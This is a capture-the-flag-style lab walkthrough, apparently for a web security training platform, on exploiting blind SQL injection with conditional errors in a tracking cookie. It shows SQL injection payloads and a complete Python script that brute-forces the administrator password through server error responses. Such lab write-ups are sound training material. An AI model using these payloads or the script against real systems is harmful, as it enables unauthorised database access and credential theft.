12 - Blind SQL injection with conditional errors

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Given : Injection point(TrackingId), Attack type(Blind), Custom error , Table(users), Columns(username,password)
End goal : Login as administrator user

Let's start solving the lab by capturing request in burp. The initial request it gives 200 Ok response -

As we know there is a blind sqli in TrackingId, after putting ' in TrackingId gives 500 Internal Server Error response -

To save our time , first we have to extract the length of the password of administrator user.So lets construct our payload to get the length. Following payload can be used to get the length using length function - ' and LENGTH((SELECT password From users where username='administrator'))=1--
use burp intruder to brute force the length value

In output we can see a differece in response code when the payload value become 20. Code of the respone changed due to the given condition in the payload -

Now we have to brute force the password. If we start brute forcing the password manually of using intruder , it takes much time. So I created a simple python script to brute force the characters of the passwords.

(make sure to change the Url , cookie values before running)

Code  python
import requests

url = "https://0a99009f03b05c2480332cd200c20039.web-security-academy.net"

char="abcdefghijklmnopqrstuvwxyz1234567890"
def get_length():
    for i in range(100):
        cookie = {'TrackingId':'P8IUnUqqZqBKVVri','session':'a09HdSQEF6PueU2Y5LyXN3TDXGPAknLn'}
        payload = f"'||(SELECT CASE WHEN (length((SELECT password from users where username='administrator'))={i}) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)--"
        cookie['TrackingId']+=payload
        res = requests.get(url,cookies=cookie)
        if res.status_code==500:
            return i
length = get_length()
print("[+] Length of password : ",length)
def get_pass(lengt):
    passwd = ""
    for i in range(1,lengt+1):
        for c in char:
            cookie = {'TrackingId':'P8IUnUqqZqBKVVri','session':'a09HdSQEF6PueU2Y5LyXN3TDXGPAknLn'}
            payload=f"'||(SELECT CASE WHEN (substr((SELECT password from users where username='administrator'),{i},1)='{c}') THEN TO_CHAR(1/0) ELSE NULL END FROM dual)--"
            cookie['TrackingId']+=payload
            res=requests.get(url,cookies=cookie)
            if res.status_code == 500:
               passwd+=c
               break
    return passwd
print("[+] Password is : ",get_pass(length))

Output :

Now we have the password of administrator user , go to my accout and login with above credentials to solve the lab.
Lab Solved :

Prev Next